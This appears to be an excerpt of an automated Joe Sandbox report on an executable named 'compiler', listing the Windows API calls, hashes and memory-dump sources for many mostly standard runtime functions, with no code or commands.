                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AllocVirtual
                                                            • String ID:
                                                            • API String ID: 1225938287-0
                                                            • Opcode ID: 010c33f1fe3f08f60b9f60e0d5542db454369c14a8d242bc09e4ef4b45aa47b9
                                                            • Instruction ID: cbb999a2e89c3e891288f2711886112fc1ce422665a26f7c2d2ee038f16160e0
                                                            • Opcode Fuzzy Hash: 010c33f1fe3f08f60b9f60e0d5542db454369c14a8d242bc09e4ef4b45aa47b9
                                                            • Instruction Fuzzy Hash: 5AE0D86171464192FE142B66B404219E260AB59BF0F884738DF3E073D9DE3CC4544380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: ce36e4cfe7bde69f8e8a1f815b20d844b4a9b38d6cdcf09269259677f3ea91e0
                                                            • Instruction ID: 27a4ec66b014e39cf3c9abef125df12c1a67e99d6a4ac7edc20c1c362dfa6770
                                                            • Opcode Fuzzy Hash: ce36e4cfe7bde69f8e8a1f815b20d844b4a9b38d6cdcf09269259677f3ea91e0
                                                            • Instruction Fuzzy Hash: BD51E372A1C68086F720AF28D0483ADBBA1F759B48F944175EB8D4764EDF2CD545CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: try_get_function
                                                            • String ID: AppPolicyGetProcessTerminationMethod
                                                            • API String ID: 2742660187-2031265017
                                                            • Opcode ID: 827bce8d22a728e387f64c933b16d69fe6891ca33f19dbbb5c98fbabb39afe60
                                                            • Instruction ID: 43a1947d41eaa159fa2db86d9956e2f7f0c92d6a72e995651e1bf606dcc71850
                                                            • Opcode Fuzzy Hash: 827bce8d22a728e387f64c933b16d69fe6891ca33f19dbbb5c98fbabb39afe60
                                                            • Instruction Fuzzy Hash: 1FE04851E0660691FF147769A4001B05211DF6A774ECC43B1DF7C063DC9D2CA5D58250
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00007FF7BADC48A8: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7BADC4BCC,?,?,?,?,00000000,COMSPEC,?,00007FF7BADC4E6A), ref: 00007FF7BADC48D2
                                                            • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7BADC4C7F,?,?,?,?,00000000,COMSPEC,?,00007FF7BADC4E6A), ref: 00007FF7BADC4EFF
                                                            • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7BADC4C7F,?,?,?,?,00000000,COMSPEC,?,00007FF7BADC4E6A), ref: 00007FF7BADC4F4B
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 2584616879bbd7011dc4075d1c01b300507de34879c9d61ba64844993e5e8c97
                                                            • Instruction ID: cf92e073f18c8dc306927c8b83c0a72fde1a78d4b4b93fdfbcee30bd574ff62b
                                                            • Opcode Fuzzy Hash: 2584616879bbd7011dc4075d1c01b300507de34879c9d61ba64844993e5e8c97
                                                            • Instruction Fuzzy Hash: 548137A2A0C28252F725BF2DD004179F791EB66740FC881B6DF8E4769DEE3DE54193A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c6ba314dbed79af2a449442d488590df858fb126267994840acb2f60592c4bf6
                                                            • Instruction ID: ff73ded73fb9979fca2bb4e178fb0a26fc87a1f94620cca037d26583e27f603b
                                                            • Opcode Fuzzy Hash: c6ba314dbed79af2a449442d488590df858fb126267994840acb2f60592c4bf6
                                                            • Instruction Fuzzy Hash: 8061D421A0A68145FA74BE2DD40477EE680EF66BA8F844271EF6D077CDCF3CE5518620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7BADB4E73,?,?,COMSPEC,00007FF7BADB5136), ref: 00007FF7BADC51F5
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7BADB4E73,?,?,COMSPEC,00007FF7BADB5136), ref: 00007FF7BADC52B9
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free
                                                            • String ID:
                                                            • API String ID: 3328510275-0
                                                            • Opcode ID: 43bcb3a514b697c9769ebe56e316c910ae962025b882180c1b6f1b66d3309fc5
                                                            • Instruction ID: f8bf9febcbff4d7ce3cfd4f77475f349780b5c19359170747e0ef88740c05901
                                                            • Opcode Fuzzy Hash: 43bcb3a514b697c9769ebe56e316c910ae962025b882180c1b6f1b66d3309fc5
                                                            • Instruction Fuzzy Hash: 1D218421E5875281FA20BF196400029E6E4FBA5BD0BD84174EF8E23B9DEF3CE4528750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7BADBBAF3,?,?,00000000,00007FF7BADBBB9B,?,?,?,?,?,?,00007FF7BADA9BB6), ref: 00007FF7BADBBC26
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7BADBBAF3,?,?,00000000,00007FF7BADBBB9B,?,?,?,?,?,?,00007FF7BADA9BB6), ref: 00007FF7BADBBC30
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                            • String ID:
                                                            • API String ID: 1687624791-0
                                                            • Opcode ID: 6826493c4fcfaa1b49cd040f5d8db0964a1505d3b6970945f02aaba9743996cc
                                                            • Instruction ID: 799f21cb44b41b5dfbb028275256b3c89856425f56d082c4a3ce924667b581b7
                                                            • Opcode Fuzzy Hash: 6826493c4fcfaa1b49cd040f5d8db0964a1505d3b6970945f02aaba9743996cc
                                                            • Instruction Fuzzy Hash: F711CD10F0864251FF90B32E969837C9292DF677A0FC403B8EF2E462DEDE6CA4418220
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF7BAD6DF1D,?,?,?,?,00007FF7BAD72701,?,?,?), ref: 00007FF7BAD6117C
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF7BAD6DF1D,?,?,?,?,00007FF7BAD72701,?,?,?), ref: 00007FF7BAD611E0
                                                              • Part of subcall function 00007FF7BAD61388: VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7BAD45B5A), ref: 00007FF7BAD613B5
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 7339188c58023be2479cba8159bf358a7a2be14a0a8b23e3be6f5dbb5fe15afe
                                                            • Instruction ID: 9949115a232ca6af4c102302a2b4ac331e25caaa8a78d7c5a80964c904db4d60
                                                            • Opcode Fuzzy Hash: 7339188c58023be2479cba8159bf358a7a2be14a0a8b23e3be6f5dbb5fe15afe
                                                            • Instruction Fuzzy Hash: FA119051B0894280FE54BB5ED444769A261EB22BC8FD84072EF0D87A8CDE2CD4858360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: Virtual$AllocFree
                                                            • String ID:
                                                            • API String ID: 2087232378-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            • String ID:
                                                            • API String ID: 3947729631-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7BADB92D1,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB768D
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Similarity
                                                            • API ID: _fread_nolock_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2335118202-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7BADBA271,?,?,?,00007FF7BADA9040,?,?,?,00007FF7BADA9006,?,?,?,00007FF7BADA918D), ref: 00007FF7BADB8A26
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 8700524d8f8de708cc1d1f87a8807334b3a2e60fe43f96bdb65c22308d0fe0a3
                                                            • Instruction ID: af8e9a09e5e970d9443c96bc64eea11bcfd2a435c7d668aebbc9bcd76918dca8
                                                            • Opcode Fuzzy Hash: 8700524d8f8de708cc1d1f87a8807334b3a2e60fe43f96bdb65c22308d0fe0a3
                                                            • Instruction Fuzzy Hash: 02F05850F0C347A4FF547AA9A801678D190CFAA7A0FC846B4EF2E862CDEE6CA54141B0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7BAD45B5A), ref: 00007FF7BAD613B5
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: fa120db0a0b702d850e342ae5cbf655343c1bd021f5caf75497a9e9138da7b56
                                                            • Instruction ID: 910c30e3820a2002584cfe6416725b65c544becece892c74d09ec53b667edff2
                                                            • Opcode Fuzzy Hash: fa120db0a0b702d850e342ae5cbf655343c1bd021f5caf75497a9e9138da7b56
                                                            • Instruction Fuzzy Hash: 44F0A726A1898581E714AF5EE0401EDB390EB94B84F5C5036EF0E4BA18CF39D4418710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 59c6b0c580812ade2945f46e9e24fd6b58a27c07793cd74858015b983e3624fe
                                                            • Instruction ID: e2da1229bb4c1a68e10836d1513fa4f8bda3c3062178d6fb3edc89851c2bca27
                                                            • Opcode Fuzzy Hash: 59c6b0c580812ade2945f46e9e24fd6b58a27c07793cd74858015b983e3624fe
                                                            • Instruction Fuzzy Hash: 37410572A0468586EB21FF29D4442ADB3A0FB56BA4F944671DFAD0B3DDCE38E446C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: strchr
                                                            • String ID:
                                                            • API String ID: 2830005266-0
                                                            • Opcode ID: 450607d1b605485776c4d278a7cc012f3fbf1fc3d66f21bdd29c06802d71596d
                                                            • Instruction ID: 9d7d5f79172e3a827a6ffea97455c59d6c00f8178ae66a94f64bc2c636264c65
                                                            • Opcode Fuzzy Hash: 450607d1b605485776c4d278a7cc012f3fbf1fc3d66f21bdd29c06802d71596d
                                                            • Instruction Fuzzy Hash: 69119022A05B4241FA14BB66E55427DA3A1EB99BD0F988670EF5D47B8DCE3CD4518310
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                            • Instruction ID: d91a1f7b065fc4423a5ac74f19fd944e7be98460ce17e839e83249e97f61ce29
                                                            • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                            • Instruction Fuzzy Hash: 3C011926604A8489E705AF3EC4504ACB7A4FB19F8DB084265DF896736CEF26D545C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 93bbb65e8b4696ea09540599237059226f52ae2612533fc72e8fc8008572ffa8
                                                            • Instruction ID: 62dccbebcd8c919a0082bd2f80663d7f171d6fd2b69e4475ef22a30083df7ee0
                                                            • Opcode Fuzzy Hash: 93bbb65e8b4696ea09540599237059226f52ae2612533fc72e8fc8008572ffa8
                                                            • Instruction Fuzzy Hash: 7FE04F52A16E8581FF54A71EC0483A46250EB6DB48F5C4034CE0C0E358EF3D909A8350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000003.1901916147.00007FF79D572000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF79D572000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_3_7ff79d572000_compiler.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05d4bd81cee4d6afe337fafba70255171d57d6fddcff4c5dc641f7f3c6d4b4e6
                                                            • Instruction ID: 071daa8d808efca351c1197a6331a4944303d97c541874eedd322a28b62d3fd6
                                                            • Opcode Fuzzy Hash: 05d4bd81cee4d6afe337fafba70255171d57d6fddcff4c5dc641f7f3c6d4b4e6
                                                            • Instruction Fuzzy Hash: 6571B630819A0A8BEBA4EF388544A61F3E0FF14321FE04778DC99D7681EB34B995C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: strchr$CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                            • String ID: PATH$\
                                                            • API String ID: 3048291518-1896636505
                                                            • Opcode ID: c022614985cd1e6d63462c07aade4fad428c27031de9a757191052ca83f36a8e
                                                            • Instruction ID: a3b6c93291ca8fdf56d625c705534374dafa4e1fc15aac19035b5ac28670a71b
                                                            • Opcode Fuzzy Hash: c022614985cd1e6d63462c07aade4fad428c27031de9a757191052ca83f36a8e
                                                            • Instruction Fuzzy Hash: 9881AF61F0C25246FB55BA6D94053B8E2A0EF67B94FC445B5DF0D07BCEEE3CA80182A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastNameTranslatewcschr$CodePageValid
                                                            • String ID: utf8
                                                            • API String ID: 4034593509-905460609
                                                            • Opcode ID: 08414fbfc6259cf32d0c897cc561d04973275c1c2dc1d9f15555a9c828afff97
                                                            • Instruction ID: 04a2e17d80b473ed3ea2555c1359c9d8163b9caa3574b3857e91e4e4090fd48f
                                                            • Opcode Fuzzy Hash: 08414fbfc6259cf32d0c897cc561d04973275c1c2dc1d9f15555a9c828afff97
                                                            • Instruction Fuzzy Hash: 32918C32B0874295FB24BB2994406BDA3A4EB66B80FC441B1DF5D4769DEF3CE551C3A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                            • String ID: ?
                                                            • API String ID: 435049134-1684325040
                                                            • Opcode ID: d072d0ac003c7fc3833c3c11cb182911db77b20a9a904b2c003c860f0c1f8cc3
                                                            • Instruction ID: ee05801e9226a5abb1fe40696824d1c744f1257a4b115aa699b3f9360cdbd69b
                                                            • Opcode Fuzzy Hash: d072d0ac003c7fc3833c3c11cb182911db77b20a9a904b2c003c860f0c1f8cc3
                                                            • Instruction Fuzzy Hash: A9D1F532A086529AFB10BF29D4412B9AB90FB66794FC44176FF4D4769DEF3CD44183A0
